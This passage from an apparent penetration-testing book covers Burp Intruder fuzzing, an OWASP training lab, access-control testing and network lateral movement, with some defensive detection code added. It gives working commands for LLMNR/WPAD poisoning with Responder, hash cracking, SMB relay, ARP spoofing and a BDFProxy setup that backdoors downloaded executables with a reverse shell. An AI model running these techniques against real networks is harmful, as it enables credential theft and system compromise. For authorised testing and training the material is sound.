[Screenshot: Burp Proxy > History with the GET /tehc/hack.php?id=2 request to www.securepla.net selected and the right-click menu open: Remove from scope, Spider from here, Do an active scan, Do a passive scan, Send to Intruder, Send to Repeater, Send to Sequencer, Send to Comparer (request), Send to Comparer (response), Show response in browser, Request in browser]

Sending Request to Intruder


Your Intruder tab at the top menu bar will light up. When you click that Intruder tab and move to the 
Positions tab, you will see a bunch of highlighted text. Since I am only testing one parameter at this 
time, I will click the "clear" button first, highlight just the "2" value (as it is the only one I want to 
fuzz), and click the "Add" button on the right side. This tells Burp to only fuzz whatever value is fed 
into the ID GET parameter and that parameter will now be yellow. 


There is another configuration selection called the Attack type. For this setting, I left it at the default 
type of Sniper. You should spend a quick second and review each of the different types of attacks on 
Burp Suite's site: 


http://portswigger.net/burp/help/intruder_positions.html. 


[Screenshot: Burp Intruder > Positions tab, "Configure the positions where payloads will be inserted into the base request", Attack type: Sniper. The request reads GET /tehc/hack.php?id=§2§ HTTP/1.1 with Host: www.securepla.net, followed by the User-Agent, Accept, Accept-Language, Accept-Encoding, Referer (http://www.securepla.net/tehc/hack.php), Cookie and Connection headers; only the id value is marked as a payload position]

Burp Payload Positions


Go to the Payloads tab (still within the Intruder tab) and click the "Load" button. In this example, I am 
only loading a list of numbers from 1-100. However, you can add almost any type of list, depending 
on what you are working with. For example, if I am working with a database or LDAP queries, I will 
know the parameter that needs to be manipulated and will import a list of those fuzzed parameters. It 
is really up to you to figure out which types of tests you should fuzz. From our set-up phase, you 
should have a great fuzzing list located under /opt/SecLists/ on your Kali machine. 

















[Screenshot: Burp Intruder > Payloads tab. Payload Sets: "You can define one or more payload sets. The number of payload sets depends on the attack type...", Payload set 1, Payload type Simple list, Payload count 150, Request count 150. Payload Options [Simple list]: "This payload type lets you configure a simple list of strings that are used as payloads", with the Add / Enter a new item field and the "Add from list ..." drop-down]

Burp List


Once you have your list imported, you will need to kick off the Intruder attack. At the top menu bar, 
go to Intruder and Start attack. After you start the attack, a new Intruder Attack window will pop up 
and Burp will start trying all of the parameter requests. 


[Screenshot: the Intruder menu open over the Payloads tab: Start attack, Open saved attack, Actively scan defined insertion points, Send to Repeater, Save attack config, Load attack config, Copy attack config, New tab behavior, Automatic payload positions, Configure predefined payload lists. The Payloads tab behind it shows Payload type Simple list, Payload count 150, Request count 150]

Starting Brute Forcing in Burp Suite


[Screenshot: Intruder attack results (Filter: Showing all items) with columns Request, Payload, Status, Error, Timeout, Length and Comment. Request 0, the baseline, returned length 582; payload 1 returned 312, payload 2 returned 582, payload 4 returned 325, and the bulk of the payloads (3, 6 through 26, 28 and 29) returned 299. The selected response is shown in the Response > Raw pane:]

HTTP/1.1 200 OK
Date: Wed, 15 Apr 2015 03:12:29 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 155
Connection: close
Content-Type: text/html

<a href=./hack.php?id=1>Document1</a>&nbsp<a href=./hack.php?id=2>Document2</a>
System Password = dont hack me<p><p>Your IP was logged:

Burp Suite Results


As the requests start populating, how can you tell if a site has been changed based on parameter 
injection? Well, the easiest way to tell is by the length of the source code on that page, when that 
string is injected. If the source code length is different from a standard baseline, this informs us that 
there have been changes to the page. 


If we look at the sample test above, the parameter values we injected from 5 to 26 resulted in a page content length of 299. This source length of 299 is now our baseline for testing. When we go through all of the responses that are not 299 in length, we see that request 27 has a page length of 315, which gives us the password: "dont hack me" (image above).


You can also try manipulating other things in the original request. Try testing cookie values, 
GET/POST/HEAD parameters, user-agent strings, and other possible vulnerable fields. 
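The demo page above notes that the visitor's IP was logged, and a sweep like this one leaves a distinctive trail on the server side. As an added example, not from the book and not a real server's logs, the Python below builds constructed Apache combined-format lines mirroring the Intruder run (one client walking id=1 to 30 at a request per second, with an ordinary visitor beside it), flags any client that requests many distinct id values for one path inside a short window, and applies the same length-baseline idea from the server's point of view to find which ids produced an unusual response size. The IPs, timestamps, thresholds and sizes are constructed.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlparse

# Apache combined format: client, identd, user, [timestamp], "METHOD target protocol", status, size, ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')


def _line(ip, second, id_, size):
    """Build one constructed log line (not a real server log)."""
    return (f'{ip} - - [15/Apr/2015:03:12:{second:02d} +0000] '
            f'"GET /tehc/hack.php?id={id_} HTTP/1.1" 200 {size} "-" "Mozilla/5.0"')


def build_sample_log():
    """10.0.0.5 sweeps id=1..30 at one request per second; 10.0.0.9 is an ordinary visitor."""
    odd_sizes = {1: 312, 2: 582, 4: 325, 27: 315}   # sizes modelled on the Intruder screenshot
    lines = [_line("10.0.0.5", i, i, odd_sizes.get(i, 299)) for i in range(1, 31)]
    lines += [_line("10.0.0.9", 5, 2, 582), _line("10.0.0.9", 40, 2, 582)]
    return lines


SAMPLE_LOG = build_sample_log()


def parse_line(line):
    """Return a dict of the fields the detections need, or None for lines that do not match."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, ts, _method, target, status, size = m.groups()
    url = urlparse(target)
    return {
        "ip": ip,
        "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
        "path": url.path,
        "id": parse_qs(url.query).get("id", [None])[0],
        "status": int(status),
        "size": 0 if size == "-" else int(size),
    }


def detect_id_sweeps(lines, window_seconds=60, min_distinct=10):
    """Flag a client that requests at least min_distinct distinct id values for one path
    within a sliding window of window_seconds (one alert per client/path)."""
    by_client = defaultdict(list)
    for event in filter(None, map(parse_line, lines)):
        if event["id"] is not None:
            by_client[(event["ip"], event["path"])].append(event)
    alerts = []
    for (ip, path), events in by_client.items():
        events.sort(key=lambda e: e["time"])
        start = 0
        for end in range(len(events)):
            while (events[end]["time"] - events[start]["time"]).total_seconds() > window_seconds:
                start += 1
            distinct = {e["id"] for e in events[start:end + 1]}
            if len(distinct) >= min_distinct:
                alerts.append({"ip": ip, "path": path, "distinct_ids": len(distinct),
                               "first_seen": events[start]["time"].isoformat()})
                break
    return alerts


def unusual_responses(lines):
    """The Intruder length-column idea from the server side: which id values produced a
    response size different from the most common one (the baseline)?"""
    events = [e for e in filter(None, map(parse_line, lines)) if e["id"] is not None]
    baseline = Counter(e["size"] for e in events).most_common(1)[0][0]
    return {e["id"]: e["size"] for e in events if e["size"] != baseline}


if __name__ == "__main__":
    for alert in detect_id_sweeps(SAMPLE_LOG):
        print("sweep:", alert)
    print("non-baseline responses:", unusual_responses(SAMPLE_LOG))
```

The enumeration alert fires once ten distinct ids have been seen within a minute from one client, long before the sweep finishes; the size report points the reviewer straight at the ids whose pages differ from the rest, which is where unlinked content sits. Tune window_seconds and min_distinct to the application's normal browsing pattern before relying on the rule.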


Other OWASP Top Ten Vulnerabilities 


Since OWASP is the standard in vulnerability categories, I strongly recommend that you familiarize 
yourself with the OWASP Top Ten Vulnerabilities by taking a moment to read through the Top Ten 
Cheat Sheet: 


• https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet


OpenDNS’ little training program provides a good training environment to test and help you 
understand these vulnerabilities. You can read more about it here: 
• https://engineering.opendns.com/2015/03/16/security-ninjas-an-open-source-application-security-training-program/


To set up their lab, create a Kali Linux image configured on host-only mode, as it will contain web 
vulnerabilities. 


Setting Up:
• service apache2 start
• git clone https://github.com/opendns/Security_Ninjas_AppSec_Training.git /opt/SNAT
• cd /opt/SNAT/
• cp /etc/php5/apache2/php.ini /etc/php5/apache2/php.ini.orig
• cp php.ini /etc/php5/apache2/
• mkdir /var/www/test/
• cp -R src/Final/* /var/www/test/
• chmod 777 /var/www/test/*.txt


Now, within your VM, open a browser to 127.0.0.1/test. This will walk you through the top ten issues, supply hints, and teach you how to exploit each of them.
[Screenshot: browser at 127.0.0.1/test showing the Security Ninjas page "A1: Injection" with its Whois Lookup Service form]

OWASP Top 10


Since this is just a testing site and is vulnerable to attacks, you might want to remove it once you are 
done testing. 


When you are done:
• rm -rf /var/www/test
• cp /etc/php5/apache2/php.ini.orig /etc/php5/apache2/php.ini
• service apache2 stop


Functional/Business Logic Testing 


I want to stress one additional aspect when testing an application: This book gives a high-level 
overview into web application testing; however, functional testing is really where you make your 
money. Functional testing includes horizontal/vertical user rights testing, application flow testing, and 
ensuring things work as they should. For example, ensuring that: 

• Users aren't able to see other users' sensitive data
• Regular users can't access administrative pages
• Users can't change data values of other users
• Workflows cannot be modified outside their intended flow


One tool to help with basic functional testing is Burp Suite Pro's Compare site maps feature. After spidering and brute-forcing pages with a regular user and a privileged user, we can go to Compare site maps.





[Screenshot: Burp Target > Site map (Filter: Hiding not found items; hiding CSS, image and general binary content; hiding 4xx responses) with the thehackerplaybook.com host selected and the right-click menu open: Remove from scope, Spider this host, Actively scan this host, Passively scan this host, Send to SQLMapper, Send to Laudanum, Engagement tools > Compare site maps, Expand branch]

Burp - Site Comparison


This will compare the two different scans and see how responses differ based on the user account. 
Finding access as a regular user to privileged content, or identifying where responses are similar or 
different, could identify misconfigurations within the application. 
Burp - Site Comparison Results


If you are interested in learning more, you can visit: 
: i lication Penetration Testing. 





This is where successful testers spend a majority of their time. Anyone can run scans, but if you are 
an effective and efficient manual tester, you are leagues above the norm. 
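What Compare site maps surfaces can be reasoned about in code. The Python below is an added example (mine, not the book's and not Burp's implementation): a constructed two-role application in a version that checks only authentication and a version that enforces the vertical (role) and horizontal (ownership) checks from the bullet list above, plus a small site-map comparison that reports, per request, whether the regular user received a response identical to the admin's. The users, paths and response bodies are constructed.

```python
import hashlib

# Constructed users and data; not the book's site.
USERS = {
    "alice": {"role": "user", "id": 1},
    "bob": {"role": "user", "id": 2},
    "root": {"role": "admin", "id": 0},
}
PROFILES = {1: "alice: account 1111, SSN ***-**-1111", 2: "bob: account 2222, SSN ***-**-2222"}
ADMIN_PANEL = "admin panel: user list, password resets"


def handle_vulnerable(user, path, params):
    """Authentication only: any logged-in user reaches /admin and any profile id."""
    if user not in USERS:
        return 302, "redirect to /login"
    if path == "/admin":
        return 200, ADMIN_PANEL
    if path == "/profile":
        return 200, PROFILES.get(int(params.get("id", "0")), "not found")
    if path == "/home":
        return 200, f"welcome {user}"
    return 404, "not found"


def handle_fixed(user, path, params):
    """Vertical check (role) on /admin, horizontal check (ownership) on /profile."""
    if user not in USERS:
        return 302, "redirect to /login"
    account = USERS[user]
    if path == "/admin":
        if account["role"] != "admin":
            return 403, "forbidden"
        return 200, ADMIN_PANEL
    if path == "/profile":
        requested = int(params.get("id", account["id"]))
        if requested != account["id"] and account["role"] != "admin":
            return 403, "forbidden"     # deny; a record of these attempts is worth keeping
        return 200, PROFILES.get(requested, "not found")
    if path == "/home":
        return 200, f"welcome {user}"
    return 404, "not found"


# The request list both users are walked through, standing in for a spidered site map.
REQUESTS = [("/home", {}), ("/admin", {}), ("/profile", {"id": "1"}), ("/profile", {"id": "2"})]


def site_map(handler, user):
    """Map each request to (status, short body hash), which is all a comparison needs."""
    result = {}
    for path, params in REQUESTS:
        status, body = handler(user, path, params)
        query = "&".join(f"{k}={v}" for k, v in sorted(params.items()))
        key = f"{path}?{query}" if query else path
        result[key] = (status, hashlib.sha256(body.encode()).hexdigest()[:12])
    return result


def compare_site_maps(privileged, low_priv):
    """Per request: 'identical' (the low-privilege user got the admin's exact response, the
    finding to chase), 'denied' (access control fired) or 'different' (content varies)."""
    verdicts = {}
    for key, (status, digest) in privileged.items():
        low_status, low_digest = low_priv.get(key, (None, None))
        if (low_status, low_digest) == (status, digest):
            verdicts[key] = "identical"
        elif low_status in (302, 401, 403):
            verdicts[key] = "denied"
        else:
            verdicts[key] = "different"
    return verdicts


if __name__ == "__main__":
    for name, handler in (("vulnerable", handle_vulnerable), ("fixed", handle_fixed)):
        print(name, compare_site_maps(site_map(handler, "root"), site_map(handler, "alice")))
```

Against the vulnerable handler the comparison marks /admin and /profile?id=2 as identical for alice, which is exactly the pair of findings (vertical and horizontal) the bullet list describes. Against the fixed handler both are denied while /profile?id=1 stays identical, as it should, since alice owns that record. Hashing bodies rather than comparing them verbatim keeps the map small and still catches a byte-for-byte match.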


Conclusion 

In a network penetration test, time is of the essence. You need to have a solid understanding of the 
underlying infrastructure, application, and possible vulnerabilities. This chapter has provided a high- 
level overview of vulnerabilities, how to identify them, and what type of impact they might have if 
that vulnerability is not resolved. 


Web vulnerabilities will probably be the most common vulnerability you will identify on an external 
penetration test. You should now be able to demonstrate how to take advantage of these issues 
efficiently. 


The Lateral Pass - Moving Through The Network 


At this point, you have compromised some servers and services through the SUCK network, but 
unfortunately, you only have low-privilege level accounts. A lateral pass play is used when you can’t 
seem to move forward. You might be on a network, but without privileges or account credentials, you 
would normally be stuck on a box. As a tester, you begin to distinguish yourself from the rest by your 
ability to move through the network and gain access to domain administrative accounts. However, as 
a penetration tester this shouldn’t be your only goal. It is also important to be able to identify where 
sensitive data is being stored and gain access to those environments. This might require pivoting 
through essential employees and understanding how the corporation segments their data. 


This section will focus on moving through the network and going from a limited user, all the way to 
owning the whole network. We will cover such topics as starting without credentials, proxying 
through hosts, having limited domain credentials, and then having local/domain credentials. 


On The Network Without Credentials: 


Let's say that you are on the network, but you don't have any credentials yet. Maybe you cracked their 
WPA2 Personal Wi-Fi password or popped a box that wasn't connected to the domain. I might first 
turn on tcpdump to listen passively, identify the network, find the domain controllers, and use other 
passive-type attacks. Once I feel like I have an understanding of the local network, I will start 
compromising systems using a variety of attacks specified in the next few sections. 


Responder.py 
(https://github.com/SpiderLabs/Responder) (Kali Linux) 


One tool that has helped me in gaining my first set of credentials is called responder.py. Responder is 
a tool that listens and responds to LLMNR (Link Local Multicast Name Resolution) and NBT-NS 
(NetBIOS over TCP/IP Name Service). 


Responder also actively takes advantage of the WPAD vulnerability. You can read more about this 
attack in the following Technet article: MS12-074 - Addressing a vulnerability in WPAD's PAC file 
handling (blogs.technet.com/b/srd/archive/2012/11/13/ms12-074-addressing-a-vulnerability-in- 
wpad-s-pac-file-handling.aspx). The basics are that when a browser (IE or network LAN settings) is 
set to automatically detect settings, the victim host will try to get the configuration file from the 
network. 





[Figure: Internet Options > Connections > LAN Settings dialog, with "Automatically detect settings" checked] 


Automatically Detect Settings 


As the attacker, since we are on the same network as our victim, we can respond to name resolution 
requests and inject our own PAC file to proxy all web traffic. This way we can force the user to 
authenticate against our SMB servers. You might ask, "Why is this important?" If we can get the 
victim host to authenticate against our SMB servers, we can request their NTLM challenge/response 
hashes without alerting the victim that anything is misconfigured. If the user is already authenticated to 
the domain, they will try to use those cached credentials to authenticate against our servers. 
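A defender-side check for the LLMNR poisoning just described, added here as an example (it is not the book's code and not part of Responder): it sends an LLMNR query for a name that cannot exist and parses whatever comes back, so any host that answers is spoofing name resolution. The canary name, the DNS-wire-format helpers and the constructed reply used to test them are this example's own assumptions.

```python
"""LLMNR canary probe: added example, not from the book or from Responder.

The poisoner above answers LLMNR queries for names no real host owns, so a
defender can query a name that cannot exist: any reply means something on the
segment is spoofing name resolution. LLMNR is DNS-formatted UDP sent to the
224.0.0.252:5355 multicast group. Run directly, this sends one such probe.
"""
import random
import socket
import struct
from typing import List, Optional, Tuple

LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355
CANARY_NAME = "no-such-host-canary"  # assumed; use any name that cannot exist


def build_llmnr_query(name: str, txid: Optional[int] = None) -> bytes:
    """Return an LLMNR query (one question, QTYPE A, QCLASS IN) for `name`."""
    if txid is None:
        txid = random.randint(0, 0xFFFF)
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)  # flags=0, QDCOUNT=1
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii") for label in name.split(".")
    ) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)


def _read_name(data: bytes, offset: int) -> Tuple[str, int]:
    """Decode a possibly compressed DNS name; return (name, offset after it)."""
    labels, end, jumped = [], offset, False
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:  # compression pointer to an earlier name
            if not jumped:
                end = offset + 2
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            jumped = True
            continue
        offset += 1
        if length == 0:
            return ".".join(labels), (end if jumped else offset)
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def parse_llmnr_answers(data: bytes, expected_txid: int) -> List[str]:
    """Return the IPv4 addresses claimed in a reply carrying `expected_txid`.

    Raises ValueError when `data` is not a response to that query.
    """
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if txid != expected_txid or not flags & 0x8000:
        raise ValueError("not a response to our query")
    offset = 12
    for _ in range(qd):  # skip the echoed question section
        _, offset = _read_name(data, offset)
        offset += 4  # QTYPE + QCLASS
    addrs = []
    for _ in range(an):
        _, offset = _read_name(data, offset)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(data[offset:offset + 4]))
        offset += rdlen
    return addrs


def probe(name: str = CANARY_NAME, timeout: float = 2.0) -> List[Tuple[str, List[str]]]:
    """Send one canary query; return [(answering host, [IPs it claimed])]."""
    txid = random.randint(0, 0xFFFF)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    hits: List[Tuple[str, List[str]]] = []
    try:
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:  # collect every answer until the timeout expires
            data, (src, _port) = sock.recvfrom(1024)
            try:
                hits.append((src, parse_llmnr_answers(data, txid)))
            except (ValueError, struct.error, IndexError):
                continue  # unrelated or malformed datagram
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits


if __name__ == "__main__":
    for src, claimed in probe():
        print(f"ALERT: {src} answered for {CANARY_NAME}, claiming {claimed}")
```

On a clean segment the probe prints nothing; a poisoner answers within the timeout and is reported with the address it tried to hand out.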


If you want to see all of the commands for Responder, along with the documentation, visit: 
https://github.com/SpiderLabs/Responder. 


If you have followed the Setup Phase, we should already have Responder installed, so let's dive right 
in. 


In the example below, we start Responder with a few different flags. The "-i" flag is the IP of your 
host, the "-b" flag is Off so that NTLM authentication is requested, and "-r" is set to Off since leaving it 
on could break things on the network: 


• python ./Responder.py -i [Attacker IP] -b Off -r Off -w On 








Responder.py 


Once Responder starts running, you should give it a few minutes to identify requests and send 
malicious responses. Below is this attack in progress. 


[Figure: Responder terminal output during the attack] 


Responder Results 


Several things happened once Responder.py started running. First, we see that the LLMNR was 
poisoned for 192.168.0.2 and a malicious WPAD file was sent to the victim. This means that all of 
their web traffic will now use our attacker machine as a proxy. This also means that anything in clear 
text is visible to us. Secondly, we see that we are tracking the cookies for any website that the user 
visits. If they go to a site over HTTP after authentication, we can now become the victim user as we 
have all their cookies. Finally, and most importantly, we see the NTLM challenge/response hashes 
through our injected attacks. 


We do have a couple of problems with these hashes though. We can't use these hashes right away in 
any sort of pass-the-hash attack, as these are NTLM challenge/response hashes, not NTLM hashes. What we 
can do with these hashes is crack them with John the Ripper or oclHashcat. 


John Example: 
$ cat hashes.txt 
cheetz::FAKEDOMAIN:1122334455667788:4D8AABB385ADC35D8ABF778E9852BC27:010100... 


$ john --format=netntlmv2 hashes.txt 

Loaded 1 password hash (NTLMv2 C/R MD4 HMAC-MD5 [32/32]) 
password (cheetz) 

oclHashcat Example: 

cudaHashcat-plus64.exe -m 5600 hashes.txt password_file.txt 


These two password-cracking examples are going to lead into the password-cracking section, but I 
wanted to give you a quick initial taste of how powerful Responder is. 


Sometimes it is not worth trying to crack a password. If you know the victim has a complex password 
policy or there aren't enough users online to get multiple hashes, you might want to try SMB relay 
attacks. Instead of enabling the SMB server in Responder, you can enable Metasploit's SMB relay 
module (use exploit/windows/smb/smb_relay) if the victim allows NTLMv1 authentication. This 
now means that any SMB requests will be forwarded to a server of your choice and their challenge 
hashes will be authenticated against that server. Let's say you are able to do this against an IT admin; 
chances are they will have escalated privileges on the servers you identified. 


If you do have to go this route, I would recommend you watch this video by Rob Fuller: 
https://www.youtube.com/watch?v=05W5tUG7z2M. Fuller talks about using ZachAttack to help 
manage all the NTLM sessions and to continually compromise the network. 


However, if the end users or servers are configured in a way that only allows NTLMv2 connections, 
these tools will fail. The only way I have been successful in SMB relay attacks for NTLMv2 
authentication is by using the Impacket framework. You can download a copy here: 


http://code.google.com/p/impacket/ 


I originally found the configuration of Impacket from: http://pen-testing.sans.org/blog/pen- 
testing/2013/04/25/smb-relay-demystified-and-ntlmv2-pwnage-with-python, which goes over the 
entire setup. I won't dive too much into this since you can visit the SANS site for more details on how to 
create a Meterpreter executable and run the Python script. 


~/Desktop/impacket-0.9.10/smbrelayx# python smbrelayx.py 
[*] Running in relay mode 
[*] Setting up SMB Server 
[*] Setting up HTTP Server 
[*] Servers started, waiting for connections 


smbrelayx.py 


Once you receive an SMB connection, it will replay that SMB against another server and 
drop/execute the reverse Meterpreter binary. We will talk later about creating reverse shells in the 
Evading AV section. 


ARP (Address Resolution Protocol) Poisoning 


Generally, ARP poisoning is used either as a last resort or for a very specific test. There are times when I 
will do one, but be aware that there is generally a good chance that you will affect end users and possibly 
cause disruptions on the network. So make sure you have a great grasp on ARP spoofing before 
performing it on an engagement. 


For those that haven't had too much experience with ARP poisoning, let's review what it does. ARP 
poisoning is a common Man in the Middle (MITM) attack that takes advantage of the insecure nature 
of ARP, specifically the transition from OSI layer 2 (MAC address) to OSI layer 3 (IP address). 
Basically, in a simple scenario, there is a network with a router (ROUTE A), a legitimate host 
(HOST A), and an attacker (HOST B). To poison these hosts, the attacker sends an unsolicited ARP 
reply to ROUTE A with the IP address of HOST A, but with their own HOST B MAC address. 
Then, the attacker sends an unsolicited ARP reply to HOST A with the IP address of ROUTE A, but 
again with their own HOST B MAC address. At this point, the router now thinks the attacker's MAC 
address belongs to HOST A, and HOST A thinks the attacker's MAC address belongs to 
ROUTE A. Ultimately, this will route all of HOST A's traffic through HOST B before going to the 
router, bidirectionally. This could lead to manipulation of traffic, sniffing for 
passwords/cookies/Kerberos keys, and more. If you want to see why ARP spoofing works, you can 
read more about it from: [link missing] 
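The scenario above (ROUTE A, HOST A, HOST B) checked from the victim's side, as an added example that is not from the book: it parses an `arp -an` table and flags a gateway whose MAC differs from a trusted baseline, or a single MAC that claims several IPs. The sample table, the baseline and every MAC address in it are constructed.

```python
"""ARP cache sanity check: added example, not from the book.

In the scenario above, ROUTE A's and HOST A's caches both end up mapping the
other's IP to HOST B's MAC. Seen from HOST A, that shows up as the gateway's
MAC differing from a trusted baseline and/or one MAC claiming several IPs.
The table below is constructed; on Linux or macOS, pass the real output of
`arp -an` to parse_arp_an instead.
"""
import re
from collections import defaultdict
from typing import Dict, List

# Matches "? (10.0.1.1) at 00:11:22:33:44:01 [ether] on eth0" (Linux) as well as
# the macOS form, which drops leading zeros ("at 0:11:22:33:44:1 on en0").
ARP_AN_RE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at "
    r"(?P<mac>[0-9a-f]{1,2}(?::[0-9a-f]{1,2}){5})",
    re.IGNORECASE,
)


def normalize_mac(mac: str) -> str:
    """Lower-case and zero-pad each octet, so 0:11:22:33:44:1 == 00:11:22:33:44:01."""
    return ":".join(octet.zfill(2) for octet in mac.lower().split(":"))


def parse_arp_an(text: str) -> Dict[str, str]:
    """Parse `arp -an`-style output into {ip: normalized mac}."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        match = ARP_AN_RE.search(line)
        if match:
            table[match["ip"]] = normalize_mac(match["mac"])
    return table


def find_arp_anomalies(table: Dict[str, str], baseline: Dict[str, str]) -> List[str]:
    """Return findings as strings; an empty list means nothing suspicious.

    `baseline` holds IP -> MAC pairs learned while the network was trusted,
    at minimum the default gateway, which is what the spoof above targets.
    """
    findings = []
    for ip, known in baseline.items():
        seen = table.get(ip)
        if seen is not None and seen != normalize_mac(known):
            findings.append(f"{ip} now resolves to {seen}, baseline was {known}")
    by_mac: Dict[str, List[str]] = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:  # one NIC answering for several hosts, as HOST B does
            findings.append(f"{mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return findings


# Constructed sample: HOST A's cache after the poisoning. 10.0.1.1 stands in
# for ROUTE A and 10.0.1.9 for HOST B; all MAC addresses are made up.
ROUTER_MAC = "00:11:22:33:44:01"
BASELINE = {"10.0.1.1": ROUTER_MAC}
SAMPLE_ARP_AN = """\
? (10.0.1.1) at 00:11:22:33:44:0b [ether] on eth0
? (10.0.1.9) at 00:11:22:33:44:0b [ether] on eth0
? (10.0.1.20) at 00:11:22:33:44:14 [ether] on eth0
"""


def check_sample() -> List[str]:
    """Run the check over the constructed table against the baseline."""
    return find_arp_anomalies(parse_arp_an(SAMPLE_ARP_AN), BASELINE)


if __name__ == "__main__":
    for finding in check_sample() or ["no ARP anomalies found"]:
        print(finding)
```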


Cain and Abel 
(http://www.oxid.it/cain.html) (Windows) 


Download: http://www.oxid.it/cain.html 
Operating System: Windows 


Let's see how we can ARP spoof our victim using Cain and Abel. To successfully ARP spoof in Cain, 
click on the sniffer button at the top-left, then click the sniffer tab and select the Scan MAC Address 
button. 


[Figure: Cain and Abel Sniffer tab with the MAC address scan results] 


Cain and Abel Scanning MAC Addresses 


Next, drop into the ARP tab at the bottom of Cain, select ARP on the left column, and click the "Plus" 
sign at the top bar (one thing to note is that the + button might not be visible. Try to click in the middle 
pane to enable that button). 
APR List 


This should bring up the IPs from the previous scan and allow you to select the host to ARP Spoof 
and the gateway IP. 
APR Poison Routing 


Lastly, click on the APR Poisoning start/stop button located at the top menu bar and you are all set. 
Successful Poisoning 


Now that we have a full MITM ARP Poisoning, we can go look for clear text passwords. You can do 
this by going to the Passwords tab at the bottom of the screen and selecting HTTP or any other clear 
text protocol. 
HTTP Clear Text 


There are many different attacks which can be performed with a full ARP spoof. I will show you a 
couple more examples in this chapter, but I will leave it up to you to figure out what is most 
appropriate for your test. 


Ettercap 
(http://ettercap.github.io/ettercap/) (Kali Linux) 


Download: http://ettercap.github.io/ettercap/ 
Operating System: Kali Linux 


If you favor Linux for providing your ARP spoofing attacks, the old school way is to do this using 
Ettercap. The basic ARP spoof command is: 


• ettercap -TqM arp:remote /10.0.1.1/ /10.0.1.7/ 


This command will perform an ARP spoof against 10.0.1.7 and the gateway 10.0.1.1 using the text 
interface (T) in quiet mode (q) and perform a MITM (M). This means that all of the traffic from 
10.0.1.7 will flow from your computer to the gateway and you will see all of the victim user's traffic. 


If you want to see the traffic natively, you can sniff using tcpdump or Wireshark. 
Ettercap 


Note that there are a lot of different plugins with ettercap and it is very beneficial to understand what 
they do. Once you are within an ettercap MITM attack, you can press the letter "P" to see all of the 
different modules you can load. By pressing "P", you should see the following. 


Example of available plugins: 

[0] arp_cop 1.1 Report suspicious ARP activity 
[0] autoadd 1.2 Automatically add new victims in the target range 
[0] chk_poison 1.1 Check if the poisoning had success 
[0] dns_spoof 1.1 Sends spoofed dns replies 
[0] finger 1.6 Fingerprint a remote host 
[0] finger_submit 1.0 Submit a fingerprint to ettercap's website 
[0] remote_browser 1.2 Sends visited URLs to the browser 
[0] search_promisc 1.2 Search promisc NICs in the LAN 
[0] smb_clear 1.0 Tries to force SMB cleartext auth 
[0] smb_down 1.0 Tries to force SMB to not use NTLM2 key auth 
[0] smurf_attack 1.0 Run a smurf attack against specified hosts 
[0] sslstrip 1.1 SSLStrip plugin 
[0] stp_mangler 1.0 Become root of a switches spanning tree 

My favorite attack to perform is dns_spoof. This allows you to control where your victim goes on 
the Internet. For example, if they go to Gmail, you can redirect the DNS request to point to a web 
server you own and capture the credentials. 


If you want to see this attack in action against software updates, visit my blog post at 
https://www.securepla.net/dont-upgrade-your-software/ where I discuss how to use this in 
combination with Evilgrade to take advantage of poor update implementation processes. But why stop 
there? 


Backdoor Factory Proxy 
(https://github.com/secretsquirrel/BDFProxy) (Kali Linux) 


BDFProxy (https://github.com/secretsquirrel/BDFProxy) is a tool that patches executables with user 
shellcode and allows the executable to perform normally. BDF will write shellcode into empty 
spaces and call hooks to that code. The best part is that it works automatically on Windows, OS X, 
and Linux. So as long as we can redirect a victim's traffic through our host, we can manipulate the 
executable before the user receives it. 


• First, we need to modify the config file to include the address of our attacking 
machine: 
  o gedit /etc/bdfproxy/bdfproxy.cfg 


bdfproxy.cfg (excerpt): 

CompressedFiles = True #True/False 
[[[LinuxIntelx86]]] 
SHELL = reverse_shell_tcp # This is the BDF syntax 
# The C2 
PORT = 8888 
SUPPLIED_SHELLCODE = None 
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax 


BDF Configuration File 


• Run BDF Proxy: 
  o bdfproxy 
• BDFProxy will create a Metasploit resource file. In a new terminal window, input: 
  o msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc 
• We also need to configure our firewall to forward all HTTP traffic through the 
mitmproxy: 
  o sysctl -w net.ipv4.ip_forward=1 
  o iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 
• Lastly, we need to configure the victim host to route through our machine using 
arpspoofing (you can find the addresses with arp -a): 
  o arpspoof -i eth0 -t <victim ip> <gateway ip> 
  o arpspoof -i eth0 -t <gateway ip> <victim ip> 

BDF Patching Binary Executables 


After the file is patched and downloaded, the unknowing victim executes the file. This will spawn off 
either a Meterpreter Shell or just a normal shell based on the type and configuration. In the example 
below, a victim downloaded a normal WinRAR installer and since it did not do any integrity 
checking, we were able to successfully patch the executable. Once executed, the file opens up a shell 
on our Metasploit listener. 
Steps After ARP Spoofing: 





If you successfully ARP-spoofed your victim, you pretty much control where the victim goes, what 
they see, what protocols they might use, and see any passwords that might be passed in clear. Let's 
